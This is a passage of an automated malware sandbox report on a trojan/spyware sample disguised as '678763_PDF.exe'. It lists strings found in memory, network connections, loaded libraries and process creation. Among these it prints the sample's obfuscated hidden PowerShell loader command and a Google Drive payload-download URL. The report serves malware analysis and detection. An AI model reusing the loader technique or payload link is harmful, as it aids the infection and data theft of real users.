            Source: Beskftigelsesmssiges.exe, 00000006.00000002.2943970761.0000000004C20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
            Source: Beskftigelsesmssiges.exe, 00000006.00000003.2239275513.0000000004C62000.00000004.00000020.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2943970761.0000000004BB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1xd9Aulm45fNbhuAM5L24KkyqjHMxxd5C&export=download
            Source: Beskftigelsesmssiges.exe, 00000006.00000002.2943970761.0000000004C20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/w
            Source: Beskftigelsesmssiges.exe, 00000006.00000002.2957342572.0000000021E9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: Beskftigelsesmssiges.exe, 00000006.00000002.2957342572.0000000021E9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: Beskftigelsesmssiges.exe, 00000006.00000002.2957342572.0000000021E9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: powershell.exe, 00000001.00000002.2144153415.00000000049D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 00000001.00000002.2148236581.00000000058EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: Beskftigelsesmssiges.exe, 00000006.00000002.2955973665.0000000020C1D000.00000004.00000800.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2955973665.0000000020CB3000.00000004.00000800.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2955973665.0000000020C8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
            Source: Beskftigelsesmssiges.exe, 00000006.00000002.2955973665.0000000020C1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
            Source: Beskftigelsesmssiges.exe, 00000006.00000002.2955973665.0000000020C8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.228
            Source: Beskftigelsesmssiges.exe, 00000006.00000002.2955973665.0000000020CB3000.00000004.00000800.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2955973665.0000000020C47000.00000004.00000800.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2955973665.0000000020C8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.228$
            Source: Beskftigelsesmssiges.exe, 00000006.00000003.2239275513.0000000004C62000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
            Source: Beskftigelsesmssiges.exe, 00000006.00000002.2957342572.0000000021CF6000.00000004.00000800.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2957342572.0000000021E4C000.00000004.00000800.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2957342572.0000000021CA8000.00000004.00000800.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2957342572.0000000021F4F000.00000004.00000800.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2957342572.0000000021D1D000.00000004.00000800.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2955973665.0000000020CD8000.00000004.00000800.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2957342572.0000000021E9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
            Source: Beskftigelsesmssiges.exe, 00000006.00000002.2957342572.0000000021E27000.00000004.00000800.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2957342572.0000000021E54000.00000004.00000800.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2957342572.0000000021C83000.00000004.00000800.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2957342572.0000000021F2A000.00000004.00000800.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2957342572.0000000021CF8000.00000004.00000800.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2957342572.0000000021CB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
            Source: Beskftigelsesmssiges.exe, 00000006.00000002.2957342572.0000000021CF6000.00000004.00000800.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2957342572.0000000021E4C000.00000004.00000800.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2957342572.0000000021CA8000.00000004.00000800.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2957342572.0000000021F4F000.00000004.00000800.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2957342572.0000000021D1D000.00000004.00000800.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2955973665.0000000020CD8000.00000004.00000800.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2957342572.0000000021E9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
            Source: Beskftigelsesmssiges.exe, 00000006.00000002.2957342572.0000000021E27000.00000004.00000800.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2957342572.0000000021E54000.00000004.00000800.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2957342572.0000000021C83000.00000004.00000800.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2957342572.0000000021F2A000.00000004.00000800.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2957342572.0000000021CF8000.00000004.00000800.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2957342572.0000000021CB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
            Source: Beskftigelsesmssiges.exe, 00000006.00000003.2239275513.0000000004C62000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/translate_a/element.js
            Source: Beskftigelsesmssiges.exe, 00000006.00000003.2239275513.0000000004C62000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;report-uri
            Source: Beskftigelsesmssiges.exe, 00000006.00000002.2957342572.0000000021E9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: Beskftigelsesmssiges.exe, 00000006.00000003.2239275513.0000000004C62000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com/analytics.js
            Source: Beskftigelsesmssiges.exe, 00000006.00000003.2239275513.0000000004C62000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
            Source: Beskftigelsesmssiges.exe, 00000006.00000003.2239275513.0000000004C62000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: Beskftigelsesmssiges.exe, 00000006.00000002.2957342572.0000000021E9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: Beskftigelsesmssiges.exe, 00000006.00000003.2239275513.0000000004C62000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
            Source: Beskftigelsesmssiges.exe, 00000006.00000003.2239275513.0000000004C62000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
            Source: Beskftigelsesmssiges.exe, 00000006.00000002.2955973665.0000000020DC2000.00000004.00000800.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2955973665.0000000020CD8000.00000004.00000800.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2955973665.0000000020DB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
            Source: Beskftigelsesmssiges.exe, 00000006.00000002.2955973665.0000000020DBD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
            Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
            Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
            Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
            Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
            Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
            Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
            Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
            Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.4:49736 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.181.129:443 -> 192.168.2.4:49737 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49839 version: TLS 1.2
            Source: C:\Users\user\Desktop\678763_PDF.exeCode function: 0_2_0040571B GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_0040571B

            System Summary

            barindex
            Source: initial sampleStatic PE information: Filename: 678763_PDF.exe
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeJump to dropped file
            Source: C:\Users\user\Desktop\678763_PDF.exeCode function: 0_2_00403532 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403532
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeCode function: 6_2_00403532 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,6_2_00403532
            Source: C:\Users\user\Desktop\678763_PDF.exeCode function: 0_2_00406DC60_2_00406DC6
            Source: C:\Users\user\Desktop\678763_PDF.exeCode function: 0_2_0040759D0_2_0040759D
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeCode function: 6_2_00406DC66_2_00406DC6
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeCode function: 6_2_0040759D6_2_0040759D
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeCode function: 6_2_0015C19B6_2_0015C19B
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeCode function: 6_2_0015D2786_2_0015D278
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeCode function: 6_2_001553626_2_00155362
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeCode function: 6_2_0015C4686_2_0015C468
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeCode function: 6_2_0015C7386_2_0015C738
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeCode function: 6_2_0015E9886_2_0015E988
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeCode function: 6_2_001569A06_2_001569A0
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeCode function: 6_2_001529E06_2_001529E0
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeCode function: 6_2_0015CA086_2_0015CA08
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeCode function: 6_2_0015CCD86_2_0015CCD8
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeCode function: 6_2_00159DE06_2_00159DE0
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeCode function: 6_2_0015CFAC6_2_0015CFAC
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeCode function: 6_2_00156FC86_2_00156FC8
            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\nsrBB8C.tmp\nsExec.dll 01E72332362345C415A7EDCB366D6A1B52BE9AC6E946FB9DA49785C140BA1A4B
            Source: 678763_PDF.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@6/13@5/5
            Source: C:\Users\user\Desktop\678763_PDF.exeCode function: 0_2_00403532 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403532
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeCode function: 6_2_00403532 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,6_2_00403532
            Source: C:\Users\user\Desktop\678763_PDF.exeCode function: 0_2_004049C7 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004049C7
            Source: C:\Users\user\Desktop\678763_PDF.exeCode function: 0_2_004021AF CoCreateInstance,0_2_004021AF
            Source: C:\Users\user\Desktop\678763_PDF.exeFile created: C:\Users\user\AppData\Roaming\erstatningsgradenJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7316:120:WilError_03
            Source: C:\Users\user\Desktop\678763_PDF.exeFile created: C:\Users\user\AppData\Local\Temp\nswBAC0.tmpJump to behavior
            Source: 678763_PDF.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
            Source: C:\Users\user\Desktop\678763_PDF.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\678763_PDF.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: 678763_PDF.exeReversingLabs: Detection: 15%
            Source: C:\Users\user\Desktop\678763_PDF.exeFile read: C:\Users\user\Desktop\678763_PDF.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\678763_PDF.exe "C:\Users\user\Desktop\678763_PDF.exe"
            Source: C:\Users\user\Desktop\678763_PDF.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Epigraphic93=gc -raw 'C:\Users\user\AppData\Roaming\erstatningsgraden\Internist\Hyperimmune.Mus';$Miljerne=$Epigraphic93.SubString(70004,3);.$Miljerne($Epigraphic93) "
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe "C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe"
            Source: C:\Users\user\Desktop\678763_PDF.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Epigraphic93=gc -raw 'C:\Users\user\AppData\Roaming\erstatningsgraden\Internist\Hyperimmune.Mus';$Miljerne=$Epigraphic93.SubString(70004,3);.$Miljerne($Epigraphic93) "Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe "C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe"Jump to behavior
            Source: C:\Users\user\Desktop\678763_PDF.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\678763_PDF.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\678763_PDF.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\678763_PDF.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\678763_PDF.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Users\user\Desktop\678763_PDF.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\678763_PDF.exeSection loaded: oleacc.dllJump to behavior
            Source: C:\Users\user\Desktop\678763_PDF.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\678763_PDF.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\678763_PDF.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\678763_PDF.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\678763_PDF.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\678763_PDF.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\678763_PDF.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\678763_PDF.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\678763_PDF.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\678763_PDF.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\678763_PDF.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\678763_PDF.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\678763_PDF.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\678763_PDF.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\678763_PDF.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\678763_PDF.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeSection loaded: schannel.dllJump to behavior
